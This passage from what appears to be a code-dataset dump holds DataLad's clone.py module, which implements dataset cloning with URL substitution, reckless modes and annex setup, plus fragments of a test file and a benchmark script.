tempfile generation on windows\n# a bunch of tested assumptions aren't met, and which ones depends on the\n# windows version being tested\n@skip_if_on_windows\ndef test_BasicAnnexTestRepo_random_location_generated():\n _test_BasicAnnexTestRepo(None) # without explicit path -- must be generated\n\n\n@with_tempfile()\ndef test_BasicAnnexTestRepo(path=None):\n _test_BasicAnnexTestRepo(path)\n\n\n@with_tempfile()\ndef test_BasicGitTestRepo(path=None):\n trepo = BasicGitTestRepo(path)\n trepo.create()\n assert_repo_status(trepo.path, annex=False)\n ok_file_under_git(trepo.path, 'test.dat')\n ok_file_under_git(trepo.path, 'INFO.txt')\n" }, { "alpha_fraction": 0.6034973859786987, "alphanum_fraction": 0.6060706973075867, 
"avg_line_length": 38.54157638549805, "blob_id": "93504a3f9991a37256703fc82bed472713448aee", "content_id": "52e1ad2d72bbb97496938f718f4727edc2f810d1", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 36141, "license_type": "permissive", "max_line_length": 117, "num_lines": 914, "path": "/datalad/core/distributed/clone.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Plumbing command for dataset installation\"\"\"\n\n\nimport logging\nfrom argparse import REMAINDER\nfrom typing import Dict\n\nfrom datalad.cmd import CommandError\nfrom datalad.config import ConfigManager\nfrom datalad.distribution.dataset import (\n Dataset,\n EnsureDataset,\n datasetmethod,\n require_dataset,\n resolve_path,\n)\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results\n)\nfrom datalad.interface.common_opts import (\n location_description,\n reckless_opt,\n)\nfrom datalad.interface.results import get_status_dict\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.constraints import (\n EnsureKeyChoice,\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.exceptions import CapturedException\nfrom datalad.support.network import (\n RI,\n PathRI,\n)\nfrom datalad.support.param import Parameter\nfrom datalad.utils import (\n knows_annex,\n PurePath,\n rmtree,\n)\n\nfrom .clone_utils import ( # needed because other code imports it from here\n _check_autoenable_special_remotes,\n _format_clone_errors,\n _generate_candidate_clone_sources,\n _get_remote,\n _get_tracking_source,\n _map_urls,\n _test_existing_clone_target,\n _try_clone_candidates,\n decode_source_spec,\n # RIA imports needed b/c datalad-next imports it from here ATM;\n # Remove after core was released and next dropped the ria patch.\n postclone_preannex_cfg_ria,\n postclonecfg_ria,\n)\n\n__docformat__ = 'restructuredtext'\n\nlgr = logging.getLogger('datalad.core.distributed.clone')\n\n\n@build_doc\nclass Clone(Interface):\n \"\"\"Obtain a dataset (copy) from a URL or local directory\n\n The purpose of this command is to obtain a new clone (copy) of a dataset\n and place it into a not-yet-existing or empty directory. As such `clone`\n provides a strict subset of the functionality offered by `install`. Only a\n single dataset can be obtained, and immediate recursive installation of\n subdatasets is not supported. 
However, once a (super)dataset is installed\n via `clone`, any content, including subdatasets can be obtained by a\n subsequent `get` command.\n\n Primary differences over a direct `git clone` call are 1) the automatic\n initialization of a dataset annex (pure Git repositories are equally\n supported); 2) automatic registration of the newly obtained dataset as a\n subdataset (submodule), if a parent dataset is specified; 3) support\n for additional resource identifiers (DataLad resource identifiers as used\n on datasets.datalad.org, and RIA store URLs as used for store.datalad.org\n - optionally in specific versions as identified by a branch or a tag; see\n examples); and 4) automatic configurable generation of alternative access\n URL for common cases (such as appending '.git' to the URL in case the\n accessing the base URL failed).\n\n In case the clone is registered as a subdataset, the original URL passed to\n `clone` is recorded in `.gitmodules` of the parent dataset in addition\n to the resolved URL used internally for git-clone. This allows to preserve\n datalad specific URLs like ria+ssh://... for subsequent calls to `get` if\n the subdataset was locally removed later on.\n\n || PYTHON >>By default, the command returns a single Dataset instance for\n an installed dataset, regardless of whether it was newly installed ('ok'\n result), or found already installed from the specified source ('notneeded'\n result).<< PYTHON ||\n\n URL mapping configuration\n\n 'clone' supports the transformation of URLs via (multi-part) substitution\n specifications. A substitution specification is defined as a configuration\n setting 'datalad.clone.url-substition.<seriesID>' with a string containing\n a match and substitution expression, each following Python's regular\n expression syntax. Both expressions are concatenated to a single string\n with an arbitrary delimiter character. The delimiter is defined by\n prefixing the string with the delimiter. Prefix and delimiter are stripped\n from the expressions (Example: \",^http://(.*)$,https://\\\\1\"). This setting\n can be defined multiple times, using the same '<seriesID>'. Substitutions\n in a series will be applied incrementally, in order of their definition.\n The first substitution in such a series must match, otherwise no further\n substitutions in a series will be considered. However, following the first\n match all further substitutions in a series are processed, regardless\n whether intermediate expressions match or not. Substitution series themselves\n have no particular order, each matching series will result in a candidate\n clone URL. Consequently, the initial match specification in a series should\n be as precise as possible to prevent inflation of candidate URLs.\n\n .. seealso::\n\n :ref:`handbook:3-001`\n More information on Remote Indexed Archive (RIA) stores\n \"\"\"\n # by default ignore everything but install results\n # i.e. 
no \"add to super dataset\"\n result_filter = EnsureKeyChoice('action', ('install',))\n # very frequently this command will yield exactly one installed dataset\n # spare people the pain of going through a list by default\n return_type = 'item-or-list'\n # as discussed in #1409 and #1470, we want to return dataset instances\n # matching what is actually available after command completion (and\n # None for any failed dataset installation)\n result_xfm = 'successdatasets-or-none'\n\n _examples_ = [\n dict(text=\"Install a dataset from GitHub into the current directory\",\n code_py=\"clone(\"\n \"source='https://github.com/datalad-datasets/longnow\"\n \"-podcasts.git')\",\n code_cmd=\"datalad clone \"\n \"https://github.com/datalad-datasets/longnow-podcasts.git\"),\n dict(text=\"Install a dataset into a specific directory\",\n code_py=\"\"\"\\\n clone(source='https://github.com/datalad-datasets/longnow-podcasts.git',\n path='myfavpodcasts')\"\"\",\n code_cmd=\"\"\"\\\n datalad clone https://github.com/datalad-datasets/longnow-podcasts.git \\\\\n myfavpodcasts\"\"\"),\n dict(text=\"Install a dataset as a subdataset into the current dataset\",\n code_py=\"\"\"\\\n clone(dataset='.',\n source='https://github.com/datalad-datasets/longnow-podcasts.git')\"\"\",\n code_cmd=\"datalad clone -d . \"\n \"https://github.com/datalad-datasets/longnow-podcasts.git\"),\n dict(text=\"Install the main superdataset from datasets.datalad.org\",\n code_py=\"clone(source='///')\",\n code_cmd=\"datalad clone ///\"),\n dict(text=\"Install a dataset identified by a literal alias from store.datalad.org\",\n code_py=\"clone(source='ria+http://store.datalad.org#~hcp-openaccess')\",\n code_cmd=\"datalad clone ria+http://store.datalad.org#~hcp-openaccess\"),\n dict(\n text=\"Install a dataset in a specific version as identified by a \"\n \"branch or tag name from store.datalad.org\",\n code_py=\"clone(source='ria+http://store.datalad.org#76b6ca66-36b1-11ea-a2e6-f0d5bf7b5561@myidentifier')\",\n code_cmd=\"datalad clone ria+http://store.datalad.org#76b6ca66-36b1-11ea-a2e6-f0d5bf7b5561@myidentifier\"),\n dict(\n text=\"Install a dataset with group-write access permissions\",\n code_py=\\\n \"clone(source='http://example.com/dataset', reckless='shared-group')\",\n code_cmd=\\\n \"datalad clone http://example.com/dataset --reckless shared-group\"),\n ]\n\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"(parent) dataset to clone into. If given, the newly cloned\n dataset is registered as a subdataset of the parent. Also, if given,\n relative paths are interpreted as being relative to the parent\n dataset, and not relative to the working directory.\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n source=Parameter(\n args=(\"source\",),\n metavar='SOURCE',\n doc=\"\"\"URL, DataLad resource identifier, local path or instance of\n dataset to be cloned\"\"\",\n constraints=EnsureStr()),\n path=Parameter(\n args=(\"path\",),\n metavar='PATH',\n nargs=\"?\",\n doc=\"\"\"path to clone into. If no `path` is provided a\n destination path will be derived from a source URL\n similar to :command:`git clone`\"\"\"),\n git_clone_opts=Parameter(\n args=(\"git_clone_opts\",),\n metavar='GIT CLONE OPTIONS',\n nargs=REMAINDER,\n doc=\"\"\"[PY: A list of command line arguments PY][CMD: Options CMD]\n to pass to :command:`git clone`. [CMD: Any argument specified after\n SOURCE and the optional PATH will be passed to git-clone. CMD] Note\n that not all options will lead to viable results. 
For example\n '--single-branch' will not result in a functional annex repository\n because both a regular branch and the git-annex branch are\n required. Note that a version in a RIA URL takes precedence over\n '--branch'.\"\"\"),\n description=location_description,\n reckless=reckless_opt,\n )\n\n @staticmethod\n @datasetmethod(name='clone')\n @eval_results\n def __call__(\n source,\n path=None,\n git_clone_opts=None,\n *,\n dataset=None,\n description=None,\n reckless=None,\n ):\n # did we explicitly get a dataset to install into?\n # if we got a dataset, path will be resolved against it.\n # Otherwise path will be resolved first.\n ds = require_dataset(\n dataset, check_installed=True, purpose='clone') \\\n if dataset is not None else dataset\n refds_path = ds.path if ds else None\n\n # legacy compatibility\n if reckless is True:\n # so that we can forget about how things used to be\n reckless = 'auto'\n\n if isinstance(source, Dataset):\n source = source.path\n\n if source == path:\n # even if they turn out to be identical after resolving symlinks\n # and more sophisticated witchcraft, it would still happily say\n # \"it appears to be already installed\", so we just catch an\n # obviously pointless input combination\n raise ValueError(\n \"clone `source` and destination `path` are identical [{}]. \"\n \"If you are trying to add a subdataset simply use `save`\".format(\n path))\n\n if path is not None:\n path = resolve_path(path, dataset)\n\n # derive target from source:\n if path is None:\n # we got nothing but a source. do something similar to git clone\n # and derive the path from the source and continue\n # since this is a relative `path`, resolve it:\n # we are not going to reuse the decoded URL, as this is done for\n # all source candidates in clone_dataset(), we just use to determine\n # a destination path here in order to perform a bunch of additional\n # checks that shall not pollute the helper function\n source_ = decode_source_spec(\n source, cfg=None if ds is None else ds.config)\n path = resolve_path(source_['default_destpath'], dataset)\n lgr.debug(\"Determined clone target path from source\")\n lgr.debug(\"Resolved clone target path to: '%s'\", path)\n\n # there is no other way -- my intoxicated brain tells me\n assert(path is not None)\n\n result_props = dict(\n action='install',\n logger=lgr,\n refds=refds_path,\n source_url=source)\n\n try:\n # this will implicitly cause pathlib to run a bunch of checks\n # whether the present path makes any sense on the platform\n # we are running on -- we don't care if the path actually\n # exists at this point, but we want to abort early if the path\n # spec is determined to be useless\n # we can do strict=False since we are 3.6+\n path.resolve(strict=False)\n except OSError as e:\n ce = CapturedException(e)\n yield get_status_dict(\n status='error',\n path=path,\n message=('cannot handle target path: %s', ce),\n exception=ce,\n **result_props)\n return\n\n destination_dataset = Dataset(path)\n result_props['ds'] = destination_dataset\n\n if ds is not None and ds.pathobj not in path.parents:\n yield get_status_dict(\n status='error',\n message=(\"clone target path '%s' not in specified target dataset '%s'\",\n path, ds),\n **result_props)\n return\n\n # perform the actual cloning operation\n clone_failure = False\n for r in clone_dataset(\n [source],\n destination_dataset,\n reckless,\n description,\n result_props,\n cfg=None if ds is None else ds.config,\n clone_opts=git_clone_opts,\n ):\n if r['status'] in ['error', 
'impossible']:\n clone_failure = True\n yield r\n\n if clone_failure:\n # do not proceed saving anything if cloning failed\n return\n\n # TODO handle any 'version' property handling and verification using a\n # dedicated public helper\n\n if ds is not None:\n # we created a dataset in another dataset\n # -> make submodule\n actually_saved_subds = False\n for r in ds.save(\n path,\n # Note, that here we know we don't save anything but a new\n # subdataset. Hence, don't go with default commit message,\n # but be more specific.\n message=\"[DATALAD] Added subdataset\",\n return_type='generator',\n result_filter=None,\n result_xfm=None,\n result_renderer='disabled',\n on_failure='ignore'):\n actually_saved_subds = actually_saved_subds or (\n r['action'] == 'save' and\n r['type'] == 'dataset' and\n r['refds'] == ds.path and\n r['status'] == 'ok')\n yield r\n\n # Modify .gitmodules to contain originally given url. This is\n # particularly relevant for postclone routines on a later `get`\n # for that subdataset. See gh-5256.\n\n if isinstance(RI(source), PathRI):\n # ensure posix paths; Windows paths would neither be meaningful\n # as a committed path nor are they currently stored correctly\n # (see gh-7182).\n # Restricted to when 'source' is identified as a path, b/c this\n # wouldn't work with file-URLs (ria or not):\n #\n # PureWindowsPath(\"file:///C:/somewhere/path\").as_posix() ->\n # 'file:/C:/somewhere/path'\n source = PurePath(source).as_posix()\n if actually_saved_subds:\n # New subdataset actually saved. Amend the modification\n # of .gitmodules.\n # Note, that we didn't allow deviating from git's default\n # behavior WRT a submodule's name vs its path when we made this\n # a new subdataset.\n subds_name = path.relative_to(ds.pathobj)\n ds.repo.call_git(\n ['config',\n '--file',\n '.gitmodules',\n '--replace-all',\n 'submodule.{}.{}'.format(subds_name,\n \"datalad-url\"),\n source]\n )\n yield from ds.save('.gitmodules',\n amend=True, to_git=True,\n result_renderer='disabled',\n return_type='generator')\n else:\n # We didn't really commit. Just call `subdatasets`\n # in that case to have the modification included in the\n # post-clone state (whatever that may be).\n ds.subdatasets(path, set_property=[(\"datalad-url\", source)])\n\n\ndef clone_dataset(\n srcs,\n destds,\n reckless=None,\n description=None,\n result_props=None,\n cfg=None,\n checkout_gitsha=None,\n clone_opts=None):\n \"\"\"Internal helper to perform cloning without sanity checks (assumed done)\n\n This helper does not handle any saving of subdataset modification or adding\n in a superdataset.\n\n Parameters\n ----------\n srcs : list\n Any suitable clone source specifications (paths, URLs)\n destds : Dataset\n Dataset instance for the clone destination\n reckless : {None, 'auto', 'ephemeral', 'shared-...'}, optional\n Mode switch to put cloned dataset into unsafe/throw-away configurations, i.e.\n sacrifice data safety for performance or resource footprint. When None\n and `cfg` is specified, use the value of `datalad.clone.reckless`.\n description : str, optional\n Location description for the annex of the dataset clone (if there is any).\n result_props : dict, optional\n Default properties for any yielded result, passed on to get_status_dict().\n cfg : ConfigManager, optional\n Configuration for parent dataset. This will be queried instead\n of the global DataLad configuration.\n checkout_gitsha : str, optional\n If given, a specific commit, identified by shasum, will be checked out after\n cloning. 
A dedicated follow-up fetch will be performed, if the initial clone\n did not obtain the commit object. Should the checkout of the target commit\n cause a detached HEAD, the previously active branch will be reset to the\n target commit.\n clone_opts : list of str, optional\n Options passed to git-clone. Note that for RIA URLs, the version is\n translated to a --branch argument, and that will take precedence over a\n --branch argument included in this value.\n\n Yields\n ------\n dict\n DataLad result records\n \"\"\"\n # apply the two in-house patches, do local to avoid circular imports\n from . import (\n clone_ephemeral,\n clone_ria,\n )\n\n if not result_props:\n # in case the caller had no specific idea on how results should look\n # like, provide sensible defaults\n result_props = dict(\n action='install',\n logger=lgr,\n ds=destds,\n )\n else:\n result_props = result_props.copy()\n\n candidate_sources = _generate_candidate_clone_sources(\n destds, srcs, cfg)\n\n # important test!\n # based on this `rmtree` will happen below after failed clone\n dest_path_existed, stop_props = _test_existing_clone_target(\n destds, candidate_sources)\n if stop_props:\n # something happened that indicates we cannot continue\n # yield and return\n result_props.update(stop_props)\n yield get_status_dict(**result_props)\n return\n\n if reckless is None and cfg:\n # if reckless is not explicitly given, but we operate on a\n # superdataset, query whether it has been instructed to operate\n # in a reckless mode, and inherit it for the coming clone\n reckless = cfg.get('datalad.clone.reckless', None)\n\n last_candidate, error_msgs, stop_props = _try_clone_candidates(\n destds=destds,\n candidate_sources=candidate_sources,\n clone_opts=clone_opts or [],\n dest_path_existed=dest_path_existed,\n )\n if stop_props:\n # no luck, report and stop\n result_props.update(stop_props)\n yield get_status_dict(**result_props)\n return\n else:\n # we can record the last attempt as the candidate URL that gave\n # a successful clone\n result_props['source'] = last_candidate\n\n if not destds.is_installed():\n # we do not have a clone, stop, provide aggregate error message\n # covering all attempts\n yield get_status_dict(\n status='error',\n message=_format_clone_errors(\n destds, error_msgs, last_candidate['giturl']),\n **result_props)\n return\n\n #\n # At minimum all further processing is all candidate for extension\n # patching. 
wrap the whole thing in try-except, catch any exceptions\n # report it as an error results `rmtree` any intermediate and return\n #\n try:\n yield from _post_gitclone_processing_(\n destds=destds,\n cfg=cfg,\n gitclonerec=last_candidate,\n reckless=reckless,\n checkout_gitsha=checkout_gitsha,\n description=description,\n )\n except Exception as e:\n ce = CapturedException(e)\n # the rational for turning any exception into an error result is that\n # we are hadly able to distinguish user-error from an other errors\n yield get_status_dict(\n status='error',\n # XXX A test in core insists on the wrong message type to be used\n #error_message=ce.message,\n message=ce.message,\n exception=ce,\n **result_props,\n )\n rmtree(destds.path, children_only=dest_path_existed)\n return\n\n # yield successful clone of the base dataset now, as any possible\n # subdataset clone down below will not alter the Git-state of the\n # parent\n yield get_status_dict(status='ok', **result_props)\n\n\ndef _post_gitclone_processing_(\n *,\n destds: Dataset,\n cfg: ConfigManager,\n gitclonerec: Dict,\n reckless: None or str,\n checkout_gitsha: None or str,\n description: None or str,\n):\n \"\"\"Perform git-clone post-processing\n\n This is helper is called immediately after a Git clone was established.\n\n The properties of that clone are passed via `gitclonerec`.\n\n Yields\n ------\n DataLad result records\n \"\"\"\n dest_repo = destds.repo\n remote = _get_remote(dest_repo)\n\n yield from _post_git_init_processing_(\n destds=destds,\n cfg=cfg,\n gitclonerec=gitclonerec,\n remote=remote,\n reckless=reckless,\n )\n\n if knows_annex(destds.path):\n # init annex when traces of a remote annex can be detected\n yield from _pre_annex_init_processing_(\n destds=destds,\n cfg=cfg,\n gitclonerec=gitclonerec,\n remote=remote,\n reckless=reckless,\n )\n dest_repo = _annex_init(\n destds=destds,\n cfg=cfg,\n gitclonerec=gitclonerec,\n remote=remote,\n description=description,\n )\n yield from _post_annex_init_processing_(\n destds=destds,\n cfg=cfg,\n gitclonerec=gitclonerec,\n remote=remote,\n reckless=reckless,\n )\n\n if checkout_gitsha and \\\n dest_repo.get_hexsha(\n dest_repo.get_corresponding_branch()) != checkout_gitsha:\n try:\n postclone_checkout_commit(dest_repo, checkout_gitsha,\n remote=remote)\n except Exception:\n # We were supposed to clone a particular version but failed to.\n # This is particularly pointless in case of subdatasets and\n # potentially fatal with current implementation of recursion.\n # see gh-5387\n lgr.debug(\n \"Failed to checkout %s, removing this clone attempt at %s\",\n checkout_gitsha, destds.path)\n raise\n\n yield from _pre_final_processing_(\n destds=destds,\n cfg=cfg,\n gitclonerec=gitclonerec,\n remote=remote,\n reckless=reckless,\n )\n\n\ndef _post_git_init_processing_(\n *,\n destds: Dataset,\n cfg: ConfigManager,\n gitclonerec: Dict,\n remote: str,\n reckless: None or str,\n):\n \"\"\"Any post-git-init processing that need not be concerned with git-annex\n \"\"\"\n if not gitclonerec.get(\"version\"):\n postclone_check_head(destds, remote=remote)\n\n # act on --reckless=shared-...\n # must happen prior git-annex-init, where we can cheaply alter the repo\n # setup through safe re-init'ing\n if reckless and reckless.startswith('shared-'):\n lgr.debug(\n 'Reinitializing %s to enable shared access permissions',\n destds)\n destds.repo.call_git(['init', '--shared={}'.format(reckless[7:])])\n\n # trick to have the function behave like a generator, even if it\n # (currently) doesn't 
actually yield anything.\n # but a patched version might want to...so for uniformity with\n # _post_annex_init_processing_() let's do this\n if False:\n yield\n\n\ndef _pre_annex_init_processing_(\n *,\n destds: Dataset,\n cfg: ConfigManager,\n gitclonerec: Dict,\n remote: str,\n reckless: None or str,\n):\n \"\"\"Pre-processing a to-be-initialized annex repository\"\"\"\n if reckless == 'auto':\n lgr.debug(\n \"Instruct annex to hardlink content in %s from local \"\n \"sources, if possible (reckless)\", destds.path)\n destds.config.set(\n 'annex.hardlink', 'true', scope='local', reload=True)\n\n # trick to have the function behave like a generator, even if it\n # (currently) doesn't actually yield anything.\n if False:\n yield\n\n\ndef _annex_init(\n *,\n destds: Dataset,\n cfg: ConfigManager,\n gitclonerec: Dict,\n remote: str,\n description: None or str,\n):\n \"\"\"Initializing an annex repository\"\"\"\n lgr.debug(\"Initializing annex repo at %s\", destds.path)\n # Note, that we cannot enforce annex-init via AnnexRepo().\n # If such an instance already exists, its __init__ will not be executed.\n # Therefore do quick test once we have an object and decide whether to call\n # its _init().\n #\n # Additionally, call init if we need to add a description (see #1403),\n # since AnnexRepo.__init__ can only do it with create=True\n repo = AnnexRepo(destds.path, init=True)\n if not repo.is_initialized() or description:\n repo._init(description=description)\n return repo\n\n\ndef _post_annex_init_processing_(\n *,\n destds: Dataset,\n cfg: ConfigManager,\n gitclonerec: Dict,\n remote: str,\n reckless: None or str,\n):\n \"\"\"Post-processing an annex repository\"\"\"\n # convenience aliases\n repo = destds.repo\n ds = destds\n\n if reckless == 'auto' or (reckless and reckless.startswith('shared-')):\n repo.call_annex(['untrust', 'here'])\n\n _check_autoenable_special_remotes(repo)\n\n # we have just cloned the repo, so it has a remote `remote`, configure any\n # reachable origin of origins\n yield from configure_origins(ds, ds, remote=remote)\n\n\ndef _pre_final_processing_(\n *,\n destds: Dataset,\n cfg: ConfigManager,\n gitclonerec: Dict,\n remote: str,\n reckless: None or str,\n):\n \"\"\"Any post-processing after Git and git-annex pieces are fully initialized\n \"\"\"\n if reckless:\n # store the reckless setting in the dataset to make it\n # known to later clones of subdatasets via get()\n destds.config.set(\n 'datalad.clone.reckless', reckless,\n scope='local',\n reload=True)\n else:\n # We would still want to reload configuration to ensure that any of the\n # above git invocations could have potentially changed the config\n # TODO: might no longer be necessary if 0.14.0 adds reloading upon\n # non-readonly commands invocation\n destds.config.reload()\n\n # trick to have the function behave like a generator, even if it\n # (currently) doesn't actually yield anything.\n if False:\n yield\n\n\ndef postclone_checkout_commit(repo, target_commit, remote=\"origin\"):\n \"\"\"Helper to check out a specific target commit in a fresh clone.\n\n Will not check (again) if current commit and target commit are already\n the same!\n \"\"\"\n # record what branch we were on right after the clone\n active_branch = repo.get_active_branch()\n corr_branch = repo.get_corresponding_branch(branch=active_branch)\n was_adjusted = bool(corr_branch)\n repo_orig_branch = corr_branch or active_branch\n # if we are on a branch this hexsha will be the tip of that branch\n repo_orig_hexsha = 
repo.get_hexsha(repo_orig_branch)\n # make sure we have the desired commit locally\n # expensive and possibly error-prone fetch conditional on cheap\n # local check\n if not repo.commit_exists(target_commit):\n try:\n repo.fetch(remote=remote, refspec=target_commit)\n except CommandError as e:\n CapturedException(e)\n pass\n # instead of inspecting the fetch results for possible ways\n # with which it could failed to produced the desired result\n # let's verify the presence of the commit directly, we are in\n # expensive-land already anyways\n if not repo.commit_exists(target_commit):\n # there is nothing we can do about this\n # MIH thinks that removing the clone is not needed, as a likely\n # next step will have to be a manual recovery intervention\n # and not another blind attempt\n raise ValueError(\n 'Target commit %s does not exist in the clone, and '\n 'a fetch that commit from remote failed'\n % target_commit[:8])\n # checkout the desired commit\n repo.call_git(['checkout', target_commit])\n # did we detach?\n if repo_orig_branch and not repo.get_active_branch():\n # trace if current state is a predecessor of the branch_hexsha\n lgr.debug(\n \"Detached HEAD after resetting worktree of %s \"\n \"(original branch: %s)\", repo, repo_orig_branch)\n if repo.get_merge_base(\n [repo_orig_hexsha, target_commit]) == target_commit:\n # we assume the target_commit to be from the same branch,\n # because it is an ancestor -- update that original branch\n # to point to the target_commit, and update HEAD to point to\n # that location\n lgr.info(\n \"Reset branch '%s' to %s (from %s) to \"\n \"avoid a detached HEAD\",\n repo_orig_branch, target_commit[:8], repo_orig_hexsha[:8])\n branch_ref = 'refs/heads/%s' % repo_orig_branch\n repo.update_ref(branch_ref, target_commit)\n repo.update_ref('HEAD', branch_ref, symbolic=True)\n if was_adjusted:\n # Note: The --force is needed because the adjust branch already\n # exists.\n repo.adjust(options=[\"--unlock\", \"--force\"])\n else:\n lgr.warning(\n \"%s has a detached HEAD, because the target commit \"\n \"%s has no unique ancestor with branch '%s'\",\n repo, target_commit[:8], repo_orig_branch)\n\n\ndef postclone_check_head(ds, remote=\"origin\"):\n repo = ds.repo\n if not repo.commit_exists(\"HEAD\"):\n # HEAD points to an unborn branch. A likely cause of this is that the\n # remote's main branch is something other than master but HEAD wasn't\n # adjusted accordingly.\n #\n # Let's choose the most recently updated remote ref (according to\n # commit date). In the case of a submodule, switching to a ref with\n # commits prevents .update_submodule() from failing. It is likely that\n # the ref includes the registered commit, but we don't have the\n # information here to know for sure. 
If it doesn't, .update_submodule()\n # will check out a detached HEAD.\n remote_branches = (\n b[\"refname:strip=2\"] for b in repo.for_each_ref_(\n fields=\"refname:strip=2\", sort=\"-committerdate\",\n pattern=\"refs/remotes/\" + remote))\n for rbranch in remote_branches:\n if rbranch in [remote + \"/git-annex\", \"HEAD\"]:\n continue\n if rbranch.startswith(remote + \"/adjusted/\"):\n # If necessary for this file system, a downstream\n # git-annex-init call will handle moving into an\n # adjusted state.\n continue\n repo.call_git([\"checkout\", \"-b\",\n rbranch[len(remote) + 1:], # drop \"<remote>/\"\n \"--track\", rbranch])\n lgr.debug(\"Checked out local branch from %s\", rbranch)\n return\n lgr.warning(\"Cloned %s but could not find a branch \"\n \"with commits\", ds.path)\n\n\ndef configure_origins(cfgds, probeds, label=None, remote=\"origin\"):\n \"\"\"Configure any discoverable local dataset sibling as a remote\n\n Parameters\n ----------\n cfgds : Dataset\n Dataset to receive the remote configurations\n probeds : Dataset\n Dataset to start looking for `remote` remotes. May be identical with\n `cfgds`.\n label : int, optional\n Each discovered remote will be configured as a remote under the name\n '<remote>-<label>'. If no label is given, '2' will be used by default,\n given that there is typically a remote named `remote` already.\n remote : str, optional\n Name of the default remote on clone.\n \"\"\"\n if label is None:\n label = 1\n # let's look at the URL for that remote and see if it is a local\n # dataset\n origin_url = probeds.config.get(f'remote.{remote}.url')\n if not origin_url:\n # no remote with default name, nothing to do\n return\n if not cfgds.config.obtain(\n 'datalad.install.inherit-local-origin',\n default=True):\n # no inheritance wanted\n return\n if not isinstance(RI(origin_url), PathRI):\n # not local path\n return\n\n # no need to reconfigure original/direct remote again\n if cfgds != probeds:\n # prevent duplicates\n known_remote_urls = set(\n cfgds.config.get(r + '.url', None)\n for r in cfgds.config.sections()\n if r.startswith('remote.')\n )\n if origin_url not in known_remote_urls:\n yield from cfgds.siblings(\n 'configure',\n # no chance for conflict, can only be the second configured\n # remote\n name='{}-{}'.format(remote, label),\n url=origin_url,\n # fetch to get all annex info\n fetch=True,\n result_renderer='disabled',\n on_failure='ignore',\n )\n # and dive deeper\n # given the clone source is a local dataset, we can have a\n # cheap look at it, and configure its own `remote` as a remote\n # (if there is any), and benefit from additional annex availability\n yield from configure_origins(\n cfgds,\n Dataset(probeds.pathobj / origin_url),\n label=label + 1,\n remote=remote)\n" }, { "alpha_fraction": 0.6037896275520325, "alphanum_fraction": 0.6135831475257874, "avg_line_length": 46.92856979370117, "blob_id": "5fb74c2aecafbbc29464589011836cda30753bb0", "content_id": "a7240553d9ffb0e0ffccd2ca6396a10bc1956589", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4697, "license_type": "permissive", "max_line_length": 94, "num_lines": 98, "path": "/benchmarks/usecases.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### 
### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Benchmarks for some use cases, typically at datalad.api level\"\"\"\n\nimport sys\nimport tempfile\nfrom datalad.utils import get_tempfile_kwargs\nimport os.path as osp\nfrom os.path import join as opj\n\nfrom datalad.api import create\n\nfrom datalad.utils import (\n create_tree,\n rmtree,\n)\n\nfrom .common import SuprocBenchmarks\n\n\nclass study_forrest(SuprocBenchmarks):\n \"\"\"\n Benchmarks for Study Forrest use cases\n \"\"\"\n\n timeout = 180 # especially with profiling might take longer than default 60s\n\n def setup(self):\n self.path = tempfile.mkdtemp(**get_tempfile_kwargs({}, prefix='bm_forrest'))\n\n def teardown(self):\n if osp.exists(self.path):\n rmtree(self.path)\n\n def time_make_studyforrest_mockup(self):\n path = self.path\n # Carries a copy of the\n # datalad.tests.utils_testdatasets.py:make_studyforrest_mockup\n # as of 0.12.0rc2-76-g6ba6d53b\n # A copy is made so we do not reflect in the benchmark results changes\n # to that helper's code. This copy only tests on 2 not 3 analyses\n # subds\n public = create(opj(path, 'public'), description=\"umbrella dataset\")\n # the following tries to capture the evolution of the project\n phase1 = public.create('phase1',\n description='old-style, no connection to RAW')\n structural = public.create('structural', description='anatomy')\n tnt = public.create('tnt', description='image templates')\n tnt.clone(source=phase1.path, path=opj('src', 'phase1'), reckless=True)\n tnt.clone(source=structural.path, path=opj('src', 'structural'), reckless=True)\n aligned = public.create('aligned', description='aligned image data')\n aligned.clone(source=phase1.path, path=opj('src', 'phase1'), reckless=True)\n aligned.clone(source=tnt.path, path=opj('src', 'tnt'), reckless=True)\n # new acquisition\n labet = create(opj(path, 'private', 'labet'), description=\"raw data ET\")\n phase2_dicoms = create(opj(path, 'private', 'p2dicoms'), description=\"raw data P2MRI\")\n phase2 = public.create('phase2',\n description='new-style, RAW connection')\n phase2.clone(source=labet.path, path=opj('src', 'labet'), reckless=True)\n phase2.clone(source=phase2_dicoms.path, path=opj('src', 'dicoms'), reckless=True)\n # add to derivatives\n tnt.clone(source=phase2.path, path=opj('src', 'phase2'), reckless=True)\n aligned.clone(source=phase2.path, path=opj('src', 'phase2'), reckless=True)\n # never to be published media files\n media = create(opj(path, 'private', 'media'), description=\"raw data ET\")\n # assuming all annotations are in one dataset (in reality this is also\n # a superdatasets with about 10 subdatasets\n annot = public.create('annotations', description='stimulus annotation')\n annot.clone(source=media.path, path=opj('src', 'media'), reckless=True)\n # a few typical analysis datasets\n # (just doing 2, actual status quo is just shy of 10)\n # and also the real goal -> meta analysis\n metaanalysis = public.create('metaanalysis', description=\"analysis of analyses\")\n for i in range(1, 2):\n ana = public.create('analysis{}'.format(i),\n description='analysis{}'.format(i))\n ana.clone(source=annot.path, path=opj('src', 'annot'), reckless=True)\n 